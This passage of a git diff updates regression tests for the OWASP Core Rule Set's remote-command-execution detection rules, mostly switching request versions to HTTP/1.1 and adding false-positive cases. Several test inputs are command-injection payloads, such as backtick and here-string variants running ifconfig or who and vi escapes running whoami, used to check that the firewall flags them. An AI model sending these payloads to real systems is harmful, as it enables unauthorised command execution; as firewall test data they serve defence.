+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [932236]
@@ -903,7 +903,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?args=performance"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [932236]
@@ -953,7 +953,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             code=;`cat<<<ifconfig`
         output:
@@ -971,7 +971,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             code=;`cat<<< ifconfig`
         output:
@@ -989,7 +989,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             code=;`cat<<<'ifconfig'`
         output:
@@ -1007,7 +1007,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             code=;`cat<<<"ifconfig"`
         output:
@@ -1025,7 +1025,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             code=;`cat<<<$(ifconfig)`
         output:
@@ -1043,7 +1043,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             code=time ifconfig
         output:
@@ -1061,7 +1061,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             code=strace ifconfig
         output:
@@ -1079,14 +1079,14 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             sentence=Cut orange quarters into crosswise slices about 1/8-inch thick.
         output:
           log:
             expect_ids: [932236]
   - test_id: 60
-    desc: "Known false positive with `Wall` at start of string (expected failure)"
+    desc: "Known false positive with `Wall` at start of string"
     stages:
       - input:
           dest_addr: 127.0.0.1
@@ -1097,12 +1097,12 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             sentence=Wall Street\\xe2\\x80\\x99s benchmark stock index struck an all-time high on Tuesday.
         output:
           log:
-            expect_ids: [932236]
+            no_expect_ids: [932236]
   - test_id: 61
     desc: "Known false positive with `Mount` at start of string (expected failure)"
     stages:
@@ -1115,7 +1115,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             sentence=Mount Airy basketball coach Bryan Hayes lectures his team during a third-quarter timeout.
         output:
@@ -1133,7 +1133,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             sentence=As you near your last year of trick or treating, though, sometimes jokes aren't enough.
         output:
@@ -1151,7 +1151,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             sentence=At any moment we can make a decision to change.
         output:
@@ -1169,7 +1169,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             code=nohup ifconfig
         output:
@@ -1187,7 +1187,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             code=ansible all -m ping
         output:
@@ -1205,7 +1205,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             code=ansible-config dump
         output:
@@ -1223,7 +1223,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             code=ansible-galaxy collection install community.general
         output:
@@ -1241,7 +1241,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             code=ansible-console
         output:
@@ -1259,7 +1259,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             code=ansible-doc plugin ping
         output:
@@ -1277,7 +1277,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             code=ansible-inventory --list
         output:
@@ -1295,7 +1295,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             code=ansible-pull --url example.com
         output:
@@ -1313,7 +1313,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             code=ansible-vault decrypt secret
         output:
@@ -1331,7 +1331,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             code=ansible-playbook site.yml
         output:
@@ -1349,7 +1349,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             code=chef-vault -i secret
         output:
@@ -1367,7 +1367,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             code=chef-shell
         output:
@@ -1385,7 +1385,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             code=chef-run all recipie.rb
         output:
@@ -1403,7 +1403,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             code=chef-client -t 1.1.1.1
         output:
@@ -1421,7 +1421,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             code=chef report nodes
         output:
@@ -1439,7 +1439,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             code=visudo
         output:
@@ -1457,9 +1457,262 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             code=cscli alerts list
         output:
           log:
             expect_ids: [932236]
+  - test_id: 81
+    desc: "False positive with session cookie, invalid command match with sudo"
+    stages:
+      - input:
+          dest_addr: 127.0.0.1
+          headers:
+            Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+            Host: localhost
+            User-Agent: "OWASP CRS test agent"
+            cookie: example=SUDoLongRandomString
+          method: POST
+          port: 80
+          uri: "/post"
+          version: HTTP/1.1
+        output:
+          log:
+            no_expect_ids: [932236]
+  - test_id: 82
+    desc: "False positive with session cookie, invalid command match with fd"
+    stages:
+      - input:
+          dest_addr: 127.0.0.1
+          headers:
+            Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+            Host: localhost
+            User-Agent: "OWASP CRS test agent"
+            cookie: example=fd01bfcfdbe02
+          method: POST
+          port: 80
+          uri: "/post"
+          version: HTTP/1.1
+        output:
+          log:
+            no_expect_ids: [932236]
+  - test_id: 83
+    desc: "False positive with UUID"
+    stages:
+      - input:
+          dest_addr: 127.0.0.1
+          headers:
+            Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+            Host: localhost
+            User-Agent: "OWASP CRS test agent"
+          method: POST
+          port: 80
+          uri: "/post"
+          version: HTTP/1.1
+          data: |
+            uuid=dfc987c2-72e2-4a8e-ad98-e0bf1bc3a01c
+        output:
+          log:
+            no_expect_ids: [932236]
+  - test_id: 84
+    desc: "False positive with word identity"
+    stages:
+      - input:
+          dest_addr: 127.0.0.1
+          headers:
+            Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+            Host: localhost
+            User-Agent: "OWASP CRS test agent"
+          method: POST
+          port: 80
+          uri: "/post"
+          version: HTTP/1.1
+          data: |
+            uuid=identity
+        output:
+          log:
+            no_expect_ids: [932236]
+  - test_id: 85
+    desc: "False positive with word unique"
+    stages:
+      - input:
+          dest_addr: 127.0.0.1
+          headers:
+            Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+            Host: localhost
+            User-Agent: "OWASP CRS test agent"
+          method: POST
+          port: 80
+          uri: "/post"
+          version: HTTP/1.1
+          data: |
+            uuid=unique
+        output:
+          log:
+            no_expect_ids: [932236]
+  - test_id: 86
+    desc: "False positive with common argument value/name `id`."
+    stages:
+      - input:
+          dest_addr: 127.0.0.1
+          headers:
+            Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+            Host: localhost
+            User-Agent: "OWASP CRS test agent"
+          method: POST
+          port: 80
+          uri: "/post"
+          version: HTTP/1.1
+          data: |
+            id=5
+        output:
+          log:
+            no_expect_ids: [932236]
+  - test_id: 87
+    desc: |
+      false positive with Nextcloud Mail widget.
+      Should not match `mail`.
+    stages:
+      - input:
+          dest_addr: 127.0.0.1
+          headers:
+            Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+            Host: localhost
+            User-Agent: "OWASP CRS test agent"
+          method: POST
+          port: 80
+          uri: "/post"
+          version: HTTP/1.1
+          data: |
+            code=mail-unread
+        output:
+          log:
+            no_expect_ids: [932236]
+  - test_id: 88
+    desc: |
+      False positive with WordPress ordering posts by date.
+      Should not match `date`.
+      Make sure there is no trailing whitespace at the end, only date with no arguments is excluded
+    stages:
+      - input:
+          dest_addr: 127.0.0.1
+          headers:
+            Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+            Host: localhost
+            User-Agent: "OWASP CRS test agent"
+          method: POST
+          port: 80
+          uri: "/wp-json/wp/v2/posts"
+          version: HTTP/1.1
+          data: |-
+            orderby=date
+        output:
+          log:
+            no_expect_ids: [932236]
+  - test_id: 89
+    desc: "Block execution of shutdown command."
+    stages:
+      - input:
+          dest_addr: 127.0.0.1
+          headers:
+            Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+            Host: localhost
+            User-Agent: "OWASP CRS test agent"
+          method: POST
+          port: 80
+          uri: "/post"
+          version: HTTP/1.1
+          data: |
+            code=shutdown
+        output:
+          log:
+            expect_ids: [932236]
+  - test_id: 90
+    desc: "Don't match very long permutations of commands when using ~"
+    stages:
+      - input:
+          dest_addr: 127.0.0.1
+          headers:
+            Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+            Host: localhost
+            User-Agent: "OWASP CRS test agent"
+          method: POST
+          port: 80
+          uri: "/post"
+          version: HTTP/1.1
+          data: |
+            code=pipaaaaaaaaaaaaaaaaaa
+        output:
+          log:
+            no_expect_ids: [932236]
+  - test_id: 91
+    desc: "Block Execution of pip3 command"
+    stages:
+      - input:
+          dest_addr: 127.0.0.1
+          headers:
+            Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+            Host: localhost
+            User-Agent: "OWASP CRS test agent"
+          method: POST
+          port: 80
+          uri: "/post"
+          version: HTTP/1.1
+          data: |
+            code=pip3 install something
+        output:
+          log:
+            expect_ids: [932236]
+  - test_id: 92
+    desc: "Block Execution of pipx command"
+    stages:
+      - input:
+          dest_addr: 127.0.0.1
+          headers:
+            Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+            Host: localhost
+            User-Agent: "OWASP CRS test agent"
+          method: POST
+          port: 80
+          uri: "/post"
+          version: HTTP/1.1
+          data: |
+            code=pipx install something
+        output:
+          log:
+            expect_ids: [932236]
+  - test_id: 93
+    desc: "False Positive: matching pipe `self`"
+    stages:
+      - input:
+          dest_addr: 127.0.0.1
+          headers:
+            Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+            Host: localhost
+            User-Agent: "OWASP CRS test agent"
+          method: POST
+          port: 80
+          uri: "/post"
+          version: HTTP/1.1
+          data: |
+            code=Compra a MODULAR ALUMINIO ESTRUCTURAL, STRUT PROFILE PG30 30X30 4 SLOTS | SELF TAPPING SCREW PG30 M1
+        output:
+          log:
+            no_expect_ids: [932236]
+  - test_id: 94
+    desc: "Ensure that `rc` is matched PL 2"
+    stages:
+      - input:
+          dest_addr: 127.0.0.1
+          headers:
+            Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+            Host: localhost
+            User-Agent: "OWASP CRS test agent"
+          method: GET
+          port: 80
+          uri: "/get?param=rc"
+          version: HTTP/1.1
+        output:
+          log:
+            expect_ids: [932236]
diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932237.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932237.yaml
index 3591d48ee..ec11685ed 100644
--- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932237.yaml
+++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932237.yaml
@@ -17,7 +17,7 @@ tests:
           version: HTTP/1.1
         output:
           log:
-            no_expect_ids: [932237]
+            expect_ids: [932237]
   - test_id: 2
     stages:
       - input:
@@ -93,7 +93,7 @@ tests:
           version: HTTP/1.1
         output:
           log:
-            no_expect_ids: [932237]
+            expect_ids: [932237]
   - test_id: 7
     stages:
       - input:
@@ -172,7 +172,7 @@ tests:
           uri: "/post"
           data: |
             code=;vi dddd +silent\\ \!whoami +wq
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [932237]
@@ -190,7 +190,7 @@ tests:
           uri: "/post"
           data: |
             code=;vi -c:\!pwd
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [932237]
@@ -206,7 +206,7 @@ tests:
           method: GET
           port: 80
           uri: "/get"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [932237]
@@ -222,7 +222,7 @@ tests:
           method: GET
           port: 80
           uri: "/get"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [932237]
@@ -241,7 +241,7 @@ tests:
           version: HTTP/1.1
         output:
           log:
-            no_expect_ids: [932237]
+            expect_ids: [932237]
   - test_id: 16
     stages:
       - input:
@@ -256,7 +256,7 @@ tests:
           version: HTTP/1.1
         output:
           log:
-            no_expect_ids: [932237]
+            expect_ids: [932237]
   - test_id: 17
     desc: "Block env command with arguments"
     stages:
@@ -302,7 +302,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932237]
@@ -318,7 +318,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932237]
@@ -334,7 +334,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932237]
@@ -350,7 +350,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932237]
@@ -366,7 +366,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932237]
@@ -382,7 +382,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932237]
@@ -398,7 +398,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932237]
@@ -414,7 +414,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932237]
@@ -430,7 +430,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932237]
@@ -446,7 +446,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932237]
@@ -462,7 +462,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932237]
@@ -478,7 +478,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932237]
@@ -494,7 +494,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932237]
@@ -510,7 +510,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932237]
@@ -526,7 +526,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932237]
@@ -542,7 +542,80 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932237]
+  - test_id: 35
+    desc: |
+      False positive with Nextcloud iOS user-agent.
+      Should not match `ip`.
+    stages:
+      - input:
+          dest_addr: 127.0.0.1
+          headers:
+            Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+            Host: localhost
+            User-Agent: "iPhone (Nextcloud iOS)"
+          method: POST
+          port: 80
+          uri: "/post"
+          version: HTTP/1.1
+        output:
+          log:
+            no_expect_ids: [932237]
+  - test_id: 36
+    desc: |
+      False positive with token in referrer.
+      Should not match `df`.
+    stages:
+      - input:
+          dest_addr: 127.0.0.1
+          headers:
+            Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+            Host: localhost
+            User-Agent: "OWASP CRS test agent"
+            referer: https://www.example.com/xyz/?abc=dfc987c2-72e2-4a8e-ad98-e0bf1bc3a01c
+          method: POST
+          port: 80
+          uri: "/post"
+          version: HTTP/1.1
+        output:
+          log:
+            no_expect_ids: [932237]
+  - test_id: 37
+    desc: |
+      False positive with Android user-agent.
+      Should not match `pg`.
+    stages:
+      - input:
+          dest_addr: 127.0.0.1
+          headers:
+            Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+            Host: localhost
+            User-Agent: "Mozilla/5.0 (Linux; Android 14; PGT-N19 Build/HONORPGT-N49; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/124.0.6367.180 Mobile Safari/537.36"
+          method: POST
+          port: 80
+          uri: "/post"
+          version: HTTP/1.1
+        output:
+          log:
+            no_expect_ids: [932237]
+  - test_id: 38
+    desc: |
+      False positive with Pashto Afghanistan User-Agent
+      Should not match `ps` in `ps-af`.
+    stages:
+      - input:
+          dest_addr: 127.0.0.1
+          headers:
+            Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+            Host: localhost
+            User-Agent: "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_10_1 rv:5.0; ps-AF) AppleWebKit/534.28.2 (KHTML, like Gecko) Version/4.0 Safari/534.28.2"
+          method: POST
+          port: 80
+          uri: "/post"
+          version: HTTP/1.1
+        output:
+          log:
+            no_expect_ids: [932237]
diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932238.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932238.yaml
index 5ab8ae6f4..b7554fc1e 100644
--- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932238.yaml
+++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932238.yaml
@@ -17,7 +17,7 @@ tests:
           uri: "/post"
           data: |
             code=;vi dddd +silent\\ \!whoami +wq
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932238]
@@ -35,7 +35,7 @@ tests:
           uri: "/post"
           data: |
             code=;vi -c:\!pwd
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932238]
@@ -51,7 +51,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             code=;`cat<<<who`
         output:
@@ -69,7 +69,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             code=;`cat<<< who`
         output:
@@ -87,7 +87,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             code=;`cat<<<'who'`
         output:
@@ -105,7 +105,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             code=;`cat<<<"who"`
         output:
@@ -123,7 +123,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             code=;`cat<<<$(who)`
         output:
@@ -141,7 +141,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             code=time who
         output:
@@ -159,7 +159,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             code=strace who
         output:
@@ -177,7 +177,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             code=nohup who
         output:
diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932239.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932239.yaml
index 7a8729b70..db81b9a6b 100644
--- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932239.yaml
+++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932239.yaml
@@ -20,7 +20,7 @@ tests:
           method: GET
           port: 80
           uri: "/get"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932239]
@@ -36,7 +36,7 @@ tests:
           method: GET
           port: 80
           uri: "/get"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932239]
@@ -173,7 +173,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932239]
@@ -333,7 +333,7 @@ tests:
           method: GET
           port: 80
           uri: "/get"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932239]
@@ -350,7 +350,7 @@ tests:
           method: GET
           port: 80
           uri: "/get"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932239]
@@ -366,7 +366,7 @@ tests:
           method: GET
           port: 80
           uri: "/get"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [932239]
@@ -382,7 +382,7 @@ tests:
           method: GET
           port: 80
           uri: "/get"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [932239]
@@ -398,7 +398,7 @@ tests:
           method: GET
           port: 80
           uri: "/get"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [932239]
@@ -415,7 +415,7 @@ tests:
           method: GET
           port: 80
           uri: "/get"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [932239]
@@ -431,7 +431,7 @@ tests:
           method: GET
           port: 80
           uri: "/get"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [932239]
@@ -448,7 +448,7 @@ tests:
           method: GET
           port: 80
           uri: "/get"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [932239]
@@ -530,7 +530,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932239]
@@ -546,7 +546,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932239]
@@ -562,7 +562,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932239]
@@ -578,7 +578,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932239]
@@ -594,7 +594,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932239]
@@ -610,7 +610,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932239]
@@ -626,7 +626,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932239]
@@ -642,7 +642,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932239]
@@ -658,7 +658,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932239]
@@ -674,7 +674,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932239]
@@ -690,7 +690,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932239]
@@ -706,7 +706,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932239]
@@ -722,7 +722,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932239]
@@ -738,7 +738,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932239]
@@ -754,7 +754,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932239]
@@ -770,7 +770,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932239]
@@ -786,7 +786,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932239]
@@ -802,7 +802,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932239]
@@ -818,7 +818,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932239]
@@ -834,7 +834,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932239]
@@ -850,7 +850,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932239]
@@ -866,7 +866,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932239]
@@ -882,7 +882,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932239]
@@ -898,7 +898,78 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932239]
+  - test_id: 54
+    desc: "False positive test with legitimate browser containing ; PGT"
+    stages:
+      - input:
+          dest_addr: 127.0.0.1
+          headers:
+            Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+            Host: localhost
+            User-Agent: "Mozilla/5.0 (Linux; Android 14; PGT-N19 Build/HONORPGT-N49; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/124.0.6367.180 Mobile Safari/537.36"
+          method: POST
+          port: 80
+          uri: "/post"
+          version: HTTP/1.1
+        output:
+          log:
+            no_expect_ids: [932239]
+  - test_id: 55
+    desc: |
+      False positive with Nextcloud iOS user-agent.
+      Should not match `ip`.
+    stages:
+      - input:
+          dest_addr: 127.0.0.1
+          headers:
+            Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+            Host: localhost
+            User-Agent: "iPhone (Nextcloud iOS)"
+          method: POST
+          port: 80
+          uri: "/post"
+          version: HTTP/1.1
+        output:
+          log:
+            no_expect_ids: [932239]
+  - test_id: 56
